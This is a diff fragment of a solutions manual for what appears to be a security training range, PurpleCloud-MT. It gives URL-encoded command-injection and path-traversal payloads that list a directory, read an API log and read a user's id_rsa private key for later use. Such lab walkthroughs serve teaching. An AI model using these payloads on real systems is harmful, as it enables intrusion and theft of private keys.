PurpleCloud-MT/General/Solutions/offensive_manual.md

 ```cmd=ls%20../../../../home/localadmin/log```
 * Recognize there is a file ```api.log``` in the directory and read it:
 ```cmd=cat%20../../../../home/localadmin/log/api.log```
-* find the name the API endpoint in the log file
+* find the name of the API endpoint and an example for an API request in the log file
 * Now go back to the home directory and read the ```id_rsa``` file:
 ```cmd=cat%20../../../../home/localadmin/id_rsa```
 * Notice that this is a private key file and save the contents from the page source code (to keep the proper format) as a .pem file.